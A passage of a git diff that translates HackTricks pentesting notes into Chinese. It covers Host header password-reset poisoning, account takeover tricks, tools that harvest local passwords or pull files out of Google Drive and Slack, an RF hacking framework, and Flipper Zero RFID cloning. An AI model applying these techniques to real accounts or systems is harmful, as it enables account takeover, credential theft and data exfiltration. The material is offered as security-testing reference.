-Several times the back-end trust the **Host header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
+几次后端信任 **Host header** 来执行某些操作。例如，它可能会使用其值作为 **发送密码重置的域**。因此，当您收到一封包含重置密码链接的电子邮件时，使用的域是您在 Host header 中输入的域。然后，您可以请求其他用户的密码重置，并将域更改为您控制的域，以窃取他们的密码重置代码。 [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
 
 > [!WARNING]
-> Note that it's possible that you don't even need to wait for the user to click on the reset password link to get the token, as maybe even **spam filters or other intermediary devices/bots will click on it to analyze it**.
+> 请注意，您甚至可能不需要等待用户点击重置密码链接来获取令牌，因为 **垃圾邮件过滤器或其他中介设备/机器人可能会点击它以进行分析**。
 
-### Session booleans
+### 会话布尔值
 
-Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\
-However, if you **pass the check** and your sessions is granted that "True" value in the security attribute, you can try to **access other resources** that **depends on the same attribute** but that you **shouldn't have permissions** to access. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
+有时，当您正确完成某些验证时，后端会 **仅将值为 "True" 的布尔值添加到您的会话的安全属性中**。然后，另一个端点将知道您是否成功通过了该检查。\
+然而，如果您 **通过检查** 并且您的会话在安全属性中获得了 "True" 值，您可以尝试 **访问其他资源**，这些资源 **依赖于相同的属性**，但您 **不应该有权限** 访问。 [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
 
-### Register functionality
+### 注册功能
 
-Try to register as an already existent user. Try also using equivalent characters (dots, lots of spaces and Unicode).
+尝试以已存在用户的身份注册。还可以尝试使用等效字符（点、多个空格和 Unicode）。
 
-### Takeover emails
+### 接管电子邮件
 
-Register an email, before confirming it change the email, then, if the new confirmation email is sent to the first registered email,you can takeover any email. Or if you can enable the second email confirming the firt one, you can also takeover any account.
+注册一个电子邮件，在确认之前更改电子邮件，然后，如果新的确认电子邮件发送到第一个注册的电子邮件，您可以接管任何电子邮件。或者，如果您可以启用第二个电子邮件以确认第一个电子邮件，您也可以接管任何账户。
 
-### Access Internal servicedesk of companies using atlassian
+### 访问使用 Atlassian 的公司的内部服务台
 
 {% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
 
-### TRACE method
+### TRACE 方法
 
-Developers might forget to disable various debugging options in the production environment. For example, the HTTP `TRACE` method is designed for diagnostic purposes. If enabled, the web server will respond to requests that use the `TRACE` method by echoing in the response the exact request that was received. This behaviour is often harmless, but occasionally leads to information disclosure, such as the name of internal authentication headers that may be appended to requests by reverse proxies.![Image for post](https://miro.medium.com/max/60/1*wDFRADTOd9Tj63xucenvAA.png?q=20)
+开发人员可能会忘记在生产环境中禁用各种调试选项。例如，HTTP `TRACE` 方法是为诊断目的而设计的。如果启用，web 服务器将通过在响应中回显收到的确切请求来响应使用 `TRACE` 方法的请求。这种行为通常是无害的，但偶尔会导致信息泄露，例如可能由反向代理附加到请求的内部身份验证头的名称。![Image for post](https://miro.medium.com/max/60/1*wDFRADTOd9Tj63xucenvAA.png?q=20)
 
 ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/pentesting-dns.md b/src/todo/pentesting-dns.md
index 97ee7c6dc..7c2ddf2de 100644
--- a/src/todo/pentesting-dns.md
+++ b/src/todo/pentesting-dns.md
@@ -1,10 +1,9 @@
 {{#include ../banners/hacktricks-training.md}}
 
-**Research more about attacks to DNS**
+**进一步研究对DNS的攻击**
 
-**DNSSEC and DNSSEC3**
+**DNSSEC和DNSSEC3**
 
-**DNS in IPv6**
+**IPv6中的DNS**
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md
index bff441463..2cada9a35 100644
--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -1,17 +1,16 @@
 {{#include ../banners/hacktricks-training.md}}
 
-## **Local l00t**
+## **本地 l00t**
 
-- [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem.
-- [**LaZagne**](https://github.com/AlessandroZ/LaZagne): The **LaZagne project** is an open source application used to **retrieve lots of passwords** stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
+- [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): 这些脚本除了寻找 PE 向量外，还会在文件系统中查找敏感信息。
+- [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne 项目**是一个开源应用程序，用于**检索存储在本地计算机上的大量密码**。每个软件使用不同的技术（明文、API、自定义算法、数据库等）存储其密码。该工具的开发目的是查找最常用软件的这些密码。
 
-## **External Services**
+## **外部服务**
 
-- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to.
-- [**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.
-- [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API.
-- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.
-- [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review.
+- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): 此模块将使用访问令牌连接到 Confluence 的 API，导出为 PDF，并下载目标可以访问的 Confluence 文档。
+- [**GD-Thief**](https://github.com/antman1p/GD-Thief): 红队工具，用于通过 Google Drive API 从目标的 Google Drive 中提取文件，攻击者可以访问这些文件。这包括所有共享文件、所有共享驱动器中的文件，以及目标可以访问的域驱动器中的所有文件。
+- [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): 红队工具，用于通过 Google 的 People API 提取您可以访问的目标组织的 Google 人员目录。
+- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** 这是一个用 Python 开发的工具，利用原生 Slack API 从给定访问令牌的 Slack 工作区中提取“有趣”的信息。
+- [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound 是一个命令行工具，供红队和蓝队快速对 Slack 工作区/组织进行侦察。Slackhound 使组织的用户、文件、消息等的收集快速可搜索，大型对象被写入 CSV 以供离线审查。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/README.md b/src/todo/radio-hacking/README.md
index 3ce0def86..6131e8de1 100644
--- a/src/todo/radio-hacking/README.md
+++ b/src/todo/radio-hacking/README.md
@@ -1,4 +1 @@
-# Radio Hacking
-
-
-
+# 无线电黑客技术
diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md
index 34c1e70a6..2b2e83ef6 100644
--- a/src/todo/radio-hacking/fissure-the-rf-framework.md
+++ b/src/todo/radio-hacking/fissure-the-rf-framework.md
@@ -1,14 +1,14 @@
 # FISSURE - The RF Framework
 
-**Frequency Independent SDR-based Signal Understanding and Reverse Engineering**
+**频率独立的基于SDR的信号理解和逆向工程**
 
-FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.
+FISSURE是一个开源的RF和逆向工程框架，旨在适应所有技能水平，具有信号检测和分类、协议发现、攻击执行、IQ操控、漏洞分析、自动化和AI/ML的钩子。该框架旨在促进软件模块、无线电、协议、信号数据、脚本、流程图、参考材料和第三方工具的快速集成。FISSURE是一个工作流启用工具，将软件集中在一个位置，使团队能够轻松跟上进度，同时共享特定Linux发行版的相同经过验证的基线配置。
 
-The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.
+FISSURE中包含的框架和工具旨在检测RF能量的存在，理解信号的特性，收集和分析样本，开发传输和/或注入技术，并制作自定义有效载荷或消息。FISSURE包含一个不断增长的协议和信号信息库，以协助识别、数据包制作和模糊测试。在线归档功能可用于下载信号文件并构建播放列表，以模拟流量和测试系统。
 
-The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.
+友好的Python代码库和用户界面使初学者能够快速了解涉及RF和逆向工程的流行工具和技术。网络安全和工程教育者可以利用内置材料或利用该框架展示他们自己的实际应用。开发人员和研究人员可以将FISSURE用于日常任务或向更广泛的受众展示他们的前沿解决方案。随着FISSURE在社区中的认知和使用的增长，其能力和所涵盖技术的广度也将随之增加。
 
-**Additional Information**
+**附加信息**
 
 * [AIS Page](https://www.ainfosec.com/technologies/fissure/)
 * [GRCon22 Slides](https://events.gnuradio.org/event/18/contributions/246/attachments/84/164/FISSURE\_Poore\_GRCon22.pdf)
@@ -18,12 +18,12 @@ The friendly Python codebase and user interface allows beginners to quickly lear
 
 ## Getting Started
 
-**Supported**
+**支持的**
 
-There are three branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2\_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; the Python3\_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8; and the Python3\_maint-3.10 branch is built around Python3, PyQt5, and GNU Radio 3.10.
+FISSURE中有三个分支，以便于文件导航并减少代码冗余。Python2\_maint-3.7分支包含围绕Python2、PyQt4和GNU Radio 3.7构建的代码库；Python3\_maint-3.8分支围绕Python3、PyQt5和GNU Radio 3.8构建；而Python3\_maint-3.10分支围绕Python3、PyQt5和GNU Radio 3.10构建。
 
-|   Operating System   |   FISSURE Branch   |
-| :------------------: | :----------------: |
+|   操作系统   |   FISSURE分支   |
+| :----------: | :-------------: |
 |  Ubuntu 18.04 (x64)  | Python2\_maint-3.7 |
 | Ubuntu 18.04.5 (x64) | Python2\_maint-3.7 |
 | Ubuntu 18.04.6 (x64) | Python2\_maint-3.7 |
@@ -31,19 +31,18 @@ There are three branches within FISSURE to make file navigation easier and reduc
 | Ubuntu 20.04.4 (x64) | Python3\_maint-3.8 |
 |  KDE neon 5.25 (x64) | Python3\_maint-3.8 |
 
-**In-Progress (beta)**
+**进行中（beta）**
 
-These operating systems are still in beta status. They are under development and several features are known to be missing. Items in the installer might conflict with existing programs or fail to install until the status is removed.
+这些操作系统仍处于beta状态。它们正在开发中，已知缺少多个功能。安装程序中的项目可能与现有程序冲突或在状态被移除之前无法安装。
 
-|     Operating System     |    FISSURE Branch   |
-| :----------------------: | :-----------------: |
+|     操作系统     |    FISSURE分支   |
+| :--------------: | :--------------: |
 | DragonOS Focal (x86\_64) |  Python3\_maint-3.8 |
 |    Ubuntu 22.04 (x64)    | Python3\_maint-3.10 |
 
-Note: Certain software tools do not work for every OS. Refer to [Software And Conflicts](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Help/Markdown/SoftwareAndConflicts.md)
-
-**Installation**
+注意：某些软件工具并不适用于每个操作系统。请参阅 [Software And Conflicts](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Help/Markdown/SoftwareAndConflicts.md)
 
+**安装**
 ```
 git clone https://github.com/ainfosec/FISSURE.git
 cd FISSURE
@@ -51,136 +50,131 @@ git checkout <Python2_maint-3.7> or <Python3_maint-3.8> or <Python3_maint-3.10>
 git submodule update --init
 ./install
 ```
+这将安装启动安装 GUI 所需的 PyQt 软件依赖项（如果未找到）。
 
-This will install PyQt software dependencies required to launch the installation GUIs if they are not found.
-
-Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).
+接下来，选择最符合您操作系统的选项（如果您的操作系统与选项匹配，则应自动检测）。
 
 |                                          Python2\_maint-3.7                                          |                                          Python3\_maint-3.8                                          |                                          Python3\_maint-3.10                                         |
 | :--------------------------------------------------------------------------------------------------: | :--------------------------------------------------------------------------------------------------: | :--------------------------------------------------------------------------------------------------: |
 | ![install1b](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install1b.png) | ![install1a](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install1a.png) | ![install1c](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install1c.png) |
 
-It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.
+建议在干净的操作系统上安装 FISSURE，以避免现有冲突。选择所有推荐的复选框（默认按钮），以避免在操作 FISSURE 内的各种工具时出现错误。安装过程中会有多个提示，主要询问提升权限和用户名。如果某个项目在末尾包含“验证”部分，安装程序将运行后面的命令，并根据命令是否产生错误将复选框项目高亮显示为绿色或红色。没有“验证”部分的已选项目在安装后将保持黑色。
 
 ![install2](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install2.png)
 
-**Usage**
-
-Open a terminal and enter:
+**使用方法**
 
+打开终端并输入：
 ```
 fissure
 ```
+参考FISSURE帮助菜单以获取更多使用细节。
 
-Refer to the FISSURE Help menu for more details on usage.
+## 细节
 
-## Details
+**组件**
 
-**Components**
-
-* Dashboard
-* Central Hub (HIPRFISR)
-* Target Signal Identification (TSI)
-* Protocol Discovery (PD)
-* Flow Graph & Script Executor (FGE)
+* 仪表板
+* 中心枢纽 (HIPRFISR)
+* 目标信号识别 (TSI)
+* 协议发现 (PD)
+* 流图与脚本执行器 (FGE)
 
 ![components](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/components.png)
 
-**Capabilities**
+**功能**
 
-| ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/detector.png)_**Signal Detector**_ | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/iq.png)_**IQ Manipulation**_      | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/library.png)_**Signal Lookup**_          | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/pd.png)_**Pattern Recognition**_ |
+| ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/detector.png)_**信号检测器**_ | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/iq.png)_**IQ操控**_      | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/library.png)_**信号查找**_          | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/pd.png)_**模式识别**_ |
 | --------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- |
-| ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/attack.png)_**Attacks**_           | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/fuzzing.png)_**Fuzzing**_         | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/archive.png)_**Signal Playlists**_       | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/gallery.png)_**Image Gallery**_  |
-| ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/packet.png)_**Packet Crafting**_   | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/scapy.png)_**Scapy Integration**_ | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/crc\_calculator.png)_**CRC Calculator**_ | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/log.png)_**Logging**_            |
+| ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/attack.png)_**攻击**_           | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/fuzzing.png)_**模糊测试**_         | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/archive.png)_**信号播放列表**_       | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/gallery.png)_**图像库**_  |
+| ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/packet.png)_**数据包构造**_   | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/scapy.png)_**Scapy集成**_ | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/crc\_calculator.png)_**CRC计算器**_ | ![](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/log.png)_**日志记录**_            |
 
-**Hardware**
+**硬件**
 
-The following is a list of "supported" hardware with varying levels of integration:
+以下是具有不同集成级别的“支持”硬件列表：
 
 * USRP: X3xx, B2xx, B20xmini, USRP2, N2xx
 * HackRF
 * RTL2832U
-* 802.11 Adapters
+* 802.11适配器
 * LimeSDR
 * bladeRF, bladeRF 2.0 micro
 * Open Sniffer
 * PlutoSDR
 
-## Lessons
+## 课程
 
-FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.
+FISSURE附带了几本有用的指南，以帮助熟悉不同的技术和技巧。许多指南包括使用集成到FISSURE中的各种工具的步骤。
 
 * [Lesson1: OpenBTS](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson1\_OpenBTS.md)
-* [Lesson2: Lua Dissectors](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson2\_LuaDissectors.md)
-* [Lesson3: Sound eXchange](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson3\_Sound\_eXchange.md)
-* [Lesson4: ESP Boards](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson4\_ESP\_Boards.md)
-* [Lesson5: Radiosonde Tracking](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson5\_Radiosonde\_Tracking.md)
+* [Lesson2: Lua解码器](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson2\_LuaDissectors.md)
+* [Lesson3: 声音交换](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson3\_Sound\_eXchange.md)
+* [Lesson4: ESP板](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson4\_ESP\_Boards.md)
+* [Lesson5: Radiosonde跟踪](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson5\_Radiosonde\_Tracking.md)
 * [Lesson6: RFID](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson6\_RFID.md)
-* [Lesson7: Data Types](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson7\_Data\_Types.md)
-* [Lesson8: Custom GNU Radio Blocks](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson8\_Custom\_GNU\_Radio\_Blocks.md)
+* [Lesson7: 数据类型](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson7\_Data\_Types.md)
+* [Lesson8: 自定义GNU Radio模块](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson8\_Custom\_GNU\_Radio\_Blocks.md)
 * [Lesson9: TPMS](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson9\_TPMS.md)
-* [Lesson10: Ham Radio Exams](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson10\_Ham\_Radio\_Exams.md)
-* [Lesson11: Wi-Fi Tools](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson11\_WiFi\_Tools.md)
+* [Lesson10: 无线电考试](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson10\_Ham\_Radio\_Exams.md)
+* [Lesson11: Wi-Fi工具](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson11\_WiFi\_Tools.md)
 
-## Roadmap
+## 路线图
 
-* [ ] Add more hardware types, RF protocols, signal parameters, analysis tools
-* [ ] Support more operating systems
-* [ ] Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
-* [ ] Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
-* [ ] Implement recursive demodulation mechanisms for producing a bitstream from unknown signals
-* [ ] Transition the main FISSURE components to a generic sensor node deployment scheme
+* [ ] 添加更多硬件类型、RF协议、信号参数、分析工具
+* [ ] 支持更多操作系统
+* [ ] 开发围绕FISSURE的课程材料（RF攻击、Wi-Fi、GNU Radio、PyQt等）
+* [ ] 创建信号调节器、特征提取器和信号分类器，支持可选择的AI/ML技术
+* [ ] 实现递归解调机制，以从未知信号生成比特流
+* [ ] 将主要FISSURE组件过渡到通用传感器节点部署方案
 
-## Contributing
+## 贡献
 
-Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the [Discussions](https://github.com/ainfosec/FISSURE/discussions) page or in the Discord Server if you have any thoughts regarding the following:
+强烈鼓励对改进FISSURE的建议。如果您对以下内容有任何想法，请在[讨论](https://github.com/ainfosec/FISSURE/discussions)页面或Discord服务器上留言：
 
-* New feature suggestions and design changes
-* Software tools with installation steps
-* New lessons or additional material for existing lessons
-* RF protocols of interest
-* More hardware and SDR types for integration
-* IQ analysis scripts in Python
-* Installation corrections and improvements
+* 新功能建议和设计变更
+* 带有安装步骤的软件工具
+* 新课程或现有课程的附加材料
+* 感兴趣的RF协议
+* 更多硬件和SDR类型以供集成
+* Python中的IQ分析脚本
+* 安装修正和改进
 
-Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:
+对FISSURE的贡献对于加速其开发至关重要。我们非常感谢您所做的任何贡献。如果您希望通过代码开发进行贡献，请先fork该项目并创建一个pull request：
 
-1. Fork the project
-2. Create your feature branch (`git checkout -b feature/AmazingFeature`)
-3. Commit your changes (`git commit -m 'Add some AmazingFeature'`)
-4. Push to the branch (`git push origin feature/AmazingFeature`)
-5. Open a pull request
+1. Fork项目
+2. 创建您的功能分支（`git checkout -b feature/AmazingFeature`）
+3. 提交您的更改（`git commit -m 'Add some AmazingFeature'`）
+4. 推送到分支（`git push origin feature/AmazingFeature`）
+5. 打开一个pull request
 
-Creating [Issues](https://github.com/ainfosec/FISSURE/issues) to bring attention to bugs is also welcomed.
+创建[问题](https://github.com/ainfosec/FISSURE/issues)以引起对错误的关注也是受欢迎的。
 
-## Collaborating
+## 合作
 
-Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities–whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.
+请联系Assured Information Security, Inc. (AIS)商业发展部，提出并正式化任何FISSURE合作机会——无论是通过投入时间集成您的软件，还是让AIS的优秀人才为您的技术挑战开发解决方案，或将FISSURE集成到其他平台/应用程序中。
 
-## License
+## 许可证
 
 GPL-3.0
 
-For license details, see LICENSE file.
+有关许可证的详细信息，请参见LICENSE文件。
 
-## Contact
+## 联系
 
-Join the Discord Server: [https://discord.gg/JZDs5sgxcG](https://discord.gg/JZDs5sgxcG)
+加入Discord服务器：[https://discord.gg/JZDs5sgxcG](https://discord.gg/JZDs5sgxcG)
 
-Follow on Twitter: [@FissureRF](https://twitter.com/fissurerf), [@AinfoSec](https://twitter.com/ainfosec)
+在Twitter上关注：[ @FissureRF](https://twitter.com/fissurerf), [@AinfoSec](https://twitter.com/ainfosec)
 
 Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com
 
-Business Development - Assured Information Security, Inc. - bd@ainfosec.com
+商业发展 - Assured Information Security, Inc. - bd@ainfosec.com
 
-## Credits
+## 贡献者
 
-We acknowledge and are grateful to these developers:
+我们感谢这些开发者：
 
 [Credits](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/CREDITS.md)
 
-## Acknowledgments
-
-Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.
-
+## 致谢
 
+特别感谢Dr. Samuel Mantravadi和Joseph Reith对本项目的贡献。
diff --git a/src/todo/radio-hacking/flipper-zero/README.md b/src/todo/radio-hacking/flipper-zero/README.md
index 99c99363e..ddfcf5d6d 100644
--- a/src/todo/radio-hacking/flipper-zero/README.md
+++ b/src/todo/radio-hacking/flipper-zero/README.md
@@ -2,18 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-With [**Flipper Zero**](https://flipperzero.one/) you can:
+使用 [**Flipper Zero**](https://flipperzero.one/) 你可以：
 
-- **Listen/Capture/Replay radio frequencies:** [**Sub-GHz**](fz-sub-ghz.md)
-- **Read/Capture/Emulate NFC cards:** [**NFC**](fz-nfc.md)
-- **Read/Capture/Emulate 125kHz tags:** [**125kHz RFID**](fz-125khz-rfid.md)
-- **Read/Capture/Send Infrared signals:** [**Infrared**](fz-infrared.md)
-- **Read/Capture/Emulate iButtons:** [**iButton**](../ibutton.md)
-- **Use is as Bad USB**
-- **Use it as security key (U2F)**
-- **Play Snake**
+- **监听/捕获/重放无线电频率：** [**Sub-GHz**](fz-sub-ghz.md)
+- **读取/捕获/模拟 NFC 卡：** [**NFC**](fz-nfc.md)
+- **读取/捕获/模拟 125kHz 标签：** [**125kHz RFID**](fz-125khz-rfid.md)
+- **读取/捕获/发送红外信号：** [**Infrared**](fz-infrared.md)
+- **读取/捕获/模拟 iButtons：** [**iButton**](../ibutton.md)
+- **用作 Bad USB**
+- **用作安全密钥 (U2F)**
+- **玩贪吃蛇**
 
-**Other Flipper Zero resources in** [**https://github.com/djsime1/awesome-flipperzer**](https://github.com/djsime1/awesome-flipperzero)
+**其他 Flipper Zero 资源在** [**https://github.com/djsime1/awesome-flipperzer**](https://github.com/djsime1/awesome-flipperzero)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index b12a38fcd..c185a7bf2 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -6,51 +6,51 @@
 
 {% embed url="https://websec.nl/" %}
 
-## Intro
+## 介绍
 
-For more info about how 125kHz tags work check:
+有关125kHz标签工作原理的更多信息，请查看：
 
 {{#ref}}
 ../pentesting-rfid.md
 {{#endref}}
 
-## Actions
+## 操作
 
-For more info about these types of tags [**read this intro**](../pentesting-rfid.md#low-frequency-rfid-tags-125khz).
+有关这些类型标签的更多信息 [**请阅读此介绍**](../pentesting-rfid.md#low-frequency-rfid-tags-125khz)。
 
-### Read
+### 读取
 
-Tries to **read** the card info. Then it can **emulate** them.
+尝试**读取**卡片信息。然后可以**模拟**它们。
 
 > [!WARNING]
-> Note that some intercoms try to protect themselves from key duplication by sending a write command prior to reading. If the write succeeds, that tag is considered fake. When Flipper emulates RFID there is no way for the reader to distinguish it from the original one, so no such problems occur.
+> 请注意，一些对讲机试图通过在读取之前发送写入命令来保护自己免受密钥复制。如果写入成功，则该标签被视为假标签。当Flipper模拟RFID时，读卡器无法将其与原始标签区分开，因此不会出现此类问题。
 
-### Add Manually
+### 手动添加
 
-You can create **fake cards in Flipper Zero indicating the data** you manually and then emulate it.
+您可以在Flipper Zero中创建**指示您手动输入数据的假卡**，然后模拟它。
 
-#### IDs on cards
+#### 卡片上的ID
 
-Some times, when you get a card you will find the ID (or part) of it written in the card visible.
+有时，当您获得一张卡时，您会发现卡片上可见的ID（或部分ID）。
 
 - **EM Marin**
 
-For example in this EM-Marin card in the physical card is possible to **read the last 3 of 5 bytes in clear**.\
-The other 2 can be brute-forced if you cannot read them from the card.
